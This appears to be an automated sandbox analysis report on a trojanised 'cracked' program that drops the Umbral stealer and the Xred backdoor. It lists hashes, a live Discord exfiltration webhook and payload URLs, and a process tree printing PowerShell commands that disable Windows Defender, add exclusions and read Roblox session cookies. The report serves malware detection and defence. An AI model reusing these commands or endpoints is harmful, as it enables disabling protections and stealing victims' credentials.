Analysis
-
max time kernel
20s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20240705-en -
submitted
18-08-2024 14:43
Static task
static1
Behavioral task
behavioral1
Sample
Byte_Guard_Cracked.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Byte_Guard_Cracked.exe
Resource
win10v2004-20240802-en
General
-
Target
Byte_Guard_Cracked.exe
-
Size
4.3MB
-
MD5
d7936c64138b924d63901cedb2c6cd09
-
SHA1
b525dd212eac4c808b5166880976b1817caf826b
-
SHA256
52124dea5ce1c6296873462826b58cf7ced4bc5bff6092af5950769482962339
-
SHA512
3c2e8b6b1de63baeda4fb714ab3f4104f820cf81d2bbe9d4177631246b7627ac1e76c709a57504ca777dfdbcc74aab95602184a270120f653832f37e4965d3f7
-
SSDEEP
98304:dnsmtk2a2052wnEFsuU8agxdazsYXhDqgAdXt2:BL4n7uB8zpXcnb2
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1271910498107129856/6QtgJK8NkWoaobhUacej3NEYw3eYaasAKEEehxN04UR57cdaVkLvywYwnoPhZkUSYxdW
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000017406-19.dat family_umbral behavioral1/memory/2716-64-0x0000000000CB0000-0x0000000000CF0000-memory.dmp family_umbral -
Umbral family
-
Xred family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1864 powershell.exe 1724 powershell.exe 2800 powershell.exe 2256 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Executes dropped EXE 14 IoCs
pid Process 2336 ._cache_Byte_Guard_Cracked.exe 2716 Umbral.exe 2844 Synaptics.exe 2740 Byte Guard.exe 840 ._cache_Byte Guard.exe 1920 ._cache_Synaptics.exe 1116 Synaptics.exe 1044 ._cache_Synaptics.exe 2848 Umbral.exe 2412 Byte Guard.exe 2880 Umbral.exe 988 Byte Guard.exe 992 ._cache_Byte Guard.exe 780 ._cache_Byte Guard.exe -
Loads dropped DLL 22 IoCs
pid Process 3056 Byte_Guard_Cracked.exe 2336 ._cache_Byte_Guard_Cracked.exe 3056 Byte_Guard_Cracked.exe 2336 ._cache_Byte_Guard_Cracked.exe 3056 Byte_Guard_Cracked.exe 2336 ._cache_Byte_Guard_Cracked.exe 2844 Synaptics.exe 2740 Byte Guard.exe 2740 Byte Guard.exe 2844 Synaptics.exe 2740 Byte Guard.exe 1116 Synaptics.exe 1116 Synaptics.exe 1116 Synaptics.exe 1044 ._cache_Synaptics.exe 1920 ._cache_Synaptics.exe 2412 Byte Guard.exe 2412 Byte Guard.exe 2412 Byte Guard.exe 988 Byte Guard.exe 988 Byte Guard.exe 988 Byte Guard.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\????? = "C:\\ProgramData\\Synaptics\\Synaptics.exe" Byte_Guard_Cracked.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\????? = "C:\\ProgramData\\Synaptics\\Synaptics.exe" Byte Guard.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Byte Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Byte Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Byte Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Byte_Guard_Cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Byte_Guard_Cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Byte Guard.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 816 cmd.exe 2240 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2928 wmic.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ._cache_Byte Guard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer ._cache_Byte Guard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ._cache_Byte Guard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion ._cache_Byte Guard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ._cache_Byte Guard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion ._cache_Byte Guard.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2240 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1660 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2304 powershell.exe 1872 powershell.exe 296 powershell.exe 2848 Umbral.exe 1864 powershell.exe 1724 powershell.exe 2800 powershell.exe 2852 powershell.exe 2256 powershell.exe 992 ._cache_Byte Guard.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 1872 powershell.exe Token: SeDebugPrivilege 296 powershell.exe Token: SeDebugPrivilege 2848 Umbral.exe Token: SeIncreaseQuotaPrivilege 2364 wmic.exe Token: SeSecurityPrivilege 2364 wmic.exe Token: SeTakeOwnershipPrivilege 2364 wmic.exe Token: SeLoadDriverPrivilege 2364 wmic.exe Token: SeSystemProfilePrivilege 2364 wmic.exe Token: SeSystemtimePrivilege 2364 wmic.exe Token: SeProfSingleProcessPrivilege 2364 wmic.exe Token: SeIncBasePriorityPrivilege 2364 wmic.exe Token: SeCreatePagefilePrivilege 2364 wmic.exe Token: SeBackupPrivilege 2364 wmic.exe Token: SeRestorePrivilege 2364 wmic.exe Token: SeShutdownPrivilege 2364 wmic.exe Token: SeDebugPrivilege 2364 wmic.exe Token: SeSystemEnvironmentPrivilege 2364 wmic.exe Token: SeRemoteShutdownPrivilege 2364 wmic.exe Token: SeUndockPrivilege 2364 wmic.exe Token: SeManageVolumePrivilege 2364 wmic.exe Token: 33 2364 wmic.exe Token: 34 2364 wmic.exe Token: 35 2364 wmic.exe Token: SeIncreaseQuotaPrivilege 2364 wmic.exe Token: SeSecurityPrivilege 2364 wmic.exe Token: SeTakeOwnershipPrivilege 2364 wmic.exe Token: SeLoadDriverPrivilege 2364 wmic.exe Token: SeSystemProfilePrivilege 2364 wmic.exe Token: SeSystemtimePrivilege 2364 wmic.exe Token: SeProfSingleProcessPrivilege 2364 wmic.exe Token: SeIncBasePriorityPrivilege 2364 wmic.exe Token: SeCreatePagefilePrivilege 2364 wmic.exe Token: SeBackupPrivilege 2364 wmic.exe Token: SeRestorePrivilege 2364 wmic.exe Token: SeShutdownPrivilege 2364 wmic.exe Token: SeDebugPrivilege 2364 wmic.exe Token: SeSystemEnvironmentPrivilege 2364 wmic.exe Token: SeRemoteShutdownPrivilege 2364 wmic.exe Token: SeUndockPrivilege 2364 wmic.exe Token: SeManageVolumePrivilege 2364 wmic.exe Token: 33 2364 wmic.exe Token: 34 2364 wmic.exe Token: 35 2364 wmic.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeIncreaseQuotaPrivilege 2628 wmic.exe Token: SeSecurityPrivilege 2628 wmic.exe Token: SeTakeOwnershipPrivilege 2628 wmic.exe Token: SeLoadDriverPrivilege 2628 wmic.exe Token: SeSystemProfilePrivilege 2628 wmic.exe Token: SeSystemtimePrivilege 2628 wmic.exe Token: SeProfSingleProcessPrivilege 2628 wmic.exe Token: SeIncBasePriorityPrivilege 2628 wmic.exe Token: SeCreatePagefilePrivilege 2628 wmic.exe Token: SeBackupPrivilege 2628 wmic.exe Token: SeRestorePrivilege 2628 wmic.exe Token: SeShutdownPrivilege 2628 wmic.exe Token: SeDebugPrivilege 2628 wmic.exe Token: SeSystemEnvironmentPrivilege 2628 wmic.exe Token: SeRemoteShutdownPrivilege 2628 wmic.exe Token: SeUndockPrivilege 2628 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1660 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2336 3056 Byte_Guard_Cracked.exe 31 PID 3056 wrote to memory of 2336 3056 Byte_Guard_Cracked.exe 31 PID 3056 wrote to memory of 2336 3056 Byte_Guard_Cracked.exe 31 PID 3056 wrote to memory of 2336 3056 Byte_Guard_Cracked.exe 31 PID 2336 wrote to memory of 2304 2336 ._cache_Byte_Guard_Cracked.exe 32 PID 2336 wrote to memory of 2304 2336 ._cache_Byte_Guard_Cracked.exe 32 PID 2336 wrote to memory of 2304 2336 ._cache_Byte_Guard_Cracked.exe 32 PID 2336 wrote to memory of 2304 2336 ._cache_Byte_Guard_Cracked.exe 32 PID 2336 wrote to memory of 2716 2336 ._cache_Byte_Guard_Cracked.exe 34 PID 2336 wrote to memory of 2716 2336 ._cache_Byte_Guard_Cracked.exe 34 PID 2336 wrote to memory of 2716 2336 ._cache_Byte_Guard_Cracked.exe 34 PID 2336 wrote to memory of 2716 2336 ._cache_Byte_Guard_Cracked.exe 34 PID 3056 wrote to memory of 2844 3056 Byte_Guard_Cracked.exe 35 PID 3056 wrote to memory of 2844 3056 Byte_Guard_Cracked.exe 35 PID 3056 wrote to memory of 2844 3056 Byte_Guard_Cracked.exe 35 PID 3056 wrote to memory of 2844 3056 Byte_Guard_Cracked.exe 35 PID 2336 wrote to memory of 2740 2336 ._cache_Byte_Guard_Cracked.exe 36 PID 2336 wrote to memory of 2740 2336 ._cache_Byte_Guard_Cracked.exe 36 PID 2336 wrote to memory of 2740 2336 ._cache_Byte_Guard_Cracked.exe 36 PID 2336 wrote to memory of 2740 2336 ._cache_Byte_Guard_Cracked.exe 36 PID 2740 wrote to memory of 840 2740 Byte Guard.exe 37 PID 2740 wrote to memory of 840 2740 Byte Guard.exe 37 PID 2740 wrote to memory of 840 2740 Byte Guard.exe 37 PID 2740 wrote to memory of 840 2740 Byte Guard.exe 37 PID 2844 wrote to memory of 1920 2844 Synaptics.exe 38 PID 2844 wrote to memory of 1920 2844 Synaptics.exe 38 PID 2844 wrote to memory of 1920 2844 Synaptics.exe 38 PID 2844 wrote to memory of 1920 2844 Synaptics.exe 38 PID 2740 wrote to memory of 1116 2740 Byte Guard.exe 39 PID 2740 wrote to memory of 1116 2740 Byte Guard.exe 39 PID 2740 wrote to memory of 1116 2740 Byte Guard.exe 39 PID 2740 wrote to memory of 1116 2740 Byte Guard.exe 39 PID 1116 wrote to memory of 1044 1116 Synaptics.exe 40 PID 1116 wrote to memory of 1044 1116 Synaptics.exe 40 PID 1116 wrote to memory of 1044 1116 Synaptics.exe 40 PID 1116 wrote to memory of 1044 1116 Synaptics.exe 40 PID 1044 wrote to memory of 1872 1044 ._cache_Synaptics.exe 42 PID 1044 wrote to memory of 1872 1044 ._cache_Synaptics.exe 42 PID 1044 wrote to memory of 1872 1044 ._cache_Synaptics.exe 42 PID 1044 wrote to memory of 1872 1044 ._cache_Synaptics.exe 42 PID 1920 wrote to memory of 296 1920 ._cache_Synaptics.exe 41 PID 1920 wrote to memory of 296 1920 ._cache_Synaptics.exe 41 PID 1920 wrote to memory of 296 1920 ._cache_Synaptics.exe 41 PID 1920 wrote to memory of 296 1920 ._cache_Synaptics.exe 41 PID 1920 wrote to memory of 2880 1920 ._cache_Synaptics.exe 45 PID 1920 wrote to memory of 2880 1920 ._cache_Synaptics.exe 45 PID 1920 wrote to memory of 2880 1920 ._cache_Synaptics.exe 45 PID 1920 wrote to memory of 2880 1920 ._cache_Synaptics.exe 45 PID 1044 wrote to memory of 2848 1044 ._cache_Synaptics.exe 46 PID 1044 wrote to memory of 2848 1044 ._cache_Synaptics.exe 46 PID 1044 wrote to memory of 2848 1044 ._cache_Synaptics.exe 46 PID 1044 wrote to memory of 2848 1044 ._cache_Synaptics.exe 46 PID 1044 wrote to memory of 2412 1044 ._cache_Synaptics.exe 48 PID 1044 wrote to memory of 2412 1044 ._cache_Synaptics.exe 48 PID 1044 wrote to memory of 2412 1044 ._cache_Synaptics.exe 48 PID 1044 wrote to memory of 2412 1044 ._cache_Synaptics.exe 48 PID 1920 wrote to memory of 988 1920 ._cache_Synaptics.exe 47 PID 1920 wrote to memory of 988 1920 ._cache_Synaptics.exe 47 PID 1920 wrote to memory of 988 1920 ._cache_Synaptics.exe 47 PID 1920 wrote to memory of 988 1920 ._cache_Synaptics.exe 47 PID 2412 wrote to memory of 992 2412 Byte Guard.exe 49 PID 2412 wrote to memory of 992 2412 Byte Guard.exe 49 PID 2412 wrote to memory of 992 2412 Byte Guard.exe 49 PID 2412 wrote to memory of 992 2412 Byte Guard.exe 49 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1752 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Byte_Guard_Cracked.exe"C:\Users\Admin\AppData\Local\Temp\Byte_Guard_Cracked.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\._cache_Byte_Guard_Cracked.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Byte_Guard_Cracked.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZQBhACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Users\Admin\AppData\Local\Umbral.exe"C:\Users\Admin\AppData\Local\Umbral.exe"3⤵
- Executes dropped EXE
PID:2716
-
-
C:\Users\Admin\AppData\Local\Byte Guard.exe"C:\Users\Admin\AppData\Local\Byte Guard.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:840
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZQBhACMAPgA="6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Users\Admin\AppData\Local\Umbral.exe"C:\Users\Admin\AppData\Local\Umbral.exe"6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Umbral.exe"7⤵
- Views/modifies file attributes
PID:1752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Umbral.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory7⤵PID:2404
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2256
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name7⤵
- Detects videocard installed
PID:2928
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Umbral.exe" && pause7⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:816 -
C:\Windows\system32\PING.EXEping localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2240
-
-
-
-
C:\Users\Admin\AppData\Local\Byte Guard.exe"C:\Users\Admin\AppData\Local\Byte Guard.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:992
-
-
-
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZQBhACMAPgA="4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296
-
-
C:\Users\Admin\AppData\Local\Umbral.exe"C:\Users\Admin\AppData\Local\Umbral.exe"4⤵
- Executes dropped EXE
PID:2880
-
-
C:\Users\Admin\AppData\Local\Byte Guard.exe"C:\Users\Admin\AppData\Local\Byte Guard.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:988 -
C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:780
-
-
-
-
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1660
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.3MB
MD5d7936c64138b924d63901cedb2c6cd09
SHA1b525dd212eac4c808b5166880976b1817caf826b
SHA25652124dea5ce1c6296873462826b58cf7ced4bc5bff6092af5950769482962339
SHA5123c2e8b6b1de63baeda4fb714ab3f4104f820cf81d2bbe9d4177631246b7627ac1e76c709a57504ca777dfdbcc74aab95602184a270120f653832f37e4965d3f7
-
Filesize
2.5MB
MD5068b2d1729ce3ea43aca321d35983886
SHA11f0265d64f80734687a5abff64163f735933ba40
SHA2567d356312b37eac1a8c175c3b715b650ef881ba83096d242a87dee1439e14aaa3
SHA51201241980cbf6d6a2f8935790e7d509e487c541590766a290b7dab889bcea6c367170d2d5c56bead75693b78e596af72b00ee22241c2c5b51e8f5384e393af0cd
-
Filesize
3.6MB
MD5c53c9140b7d6c214c6d168d34365418c
SHA172144ae7d77432b217f73be33eae773f7cc0dcf7
SHA2568d0405c5776efbedc678af7096a129fea77d1df352a23bf87a9fa3485d2ea143
SHA512f4f912b5784eacfecbf3fcf6876ed573df519070a2d663eb7985a8544a28b03fade339c2eca93b2da7f1240cec60ae1929b81f217c711e575e2d2908ddb80910
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
22KB
MD5bf8bb0d42f518022d9672f559f355f18
SHA177f332d20bbab1ed682b2dadad8a3940c3ff1be2
SHA256eaff36ada85c8edd20b2c666dc6d53fe94fbaaef339fd39e4a9aa568cdb0543e
SHA5122615b2e3be66ed9b74a708af687a4ffac0377c619e908a38de64d4a76858d92d82687809e2b6468f3d3ff0a895cba81f344b8ce52c82cfeb3ece001847976a4f
-
Filesize
26KB
MD546f73cbf62a9f4510b3974280da5c74d
SHA169a0a62907bde99c550f3a4b867d0cf2e0e1095a
SHA2560fbd182b8849fbec92fafc01eb8ac39fbcfe952ee4a174726c34bd7fb64c29c2
SHA5127eb4487caaa040112c0fa8a9816f18300eff917bf6b410a1a90719aec6b3941adbfce038b905fe480471f59be7bae45682f92d5e3516aa8aeb1495a09c6c742e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5efe17962516ac31cadb093110914f224
SHA19e4d4cc38d6a40d3887bc6ff40e5f46d347be099
SHA25611600a9f590ba1b62cf91a15467d503b91db0b13b51529cf8f4316baced2ac5a
SHA51273859d4ed5ad115a7e69b63a259eab69dbbc947929a11ce76a68f42d5c8554efc386dc68ece91b1e33765290f9f368e5bf27efa25c7a665f41d12d7bde0c7f68
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O9WR0AG5UZVLED1RNY00.temp
Filesize7KB
MD59d05fe2b6a863de95586ab1c180515a4
SHA1ed8c2971b8fdce26f714f9c9b39975060391cf3c
SHA256c1c754d5eac14e1de6780807d99de9eea6b58f37b888c29e31fe003a442b9313
SHA51297b00130168bc66ee674ead16771f5ea392d758a2d699dade08e5b7c3698e1a37b049ea881eecef49007f5da4c377b52d17470aa0eee85a674480e2b7b85c85b
-
Filesize
3.2MB
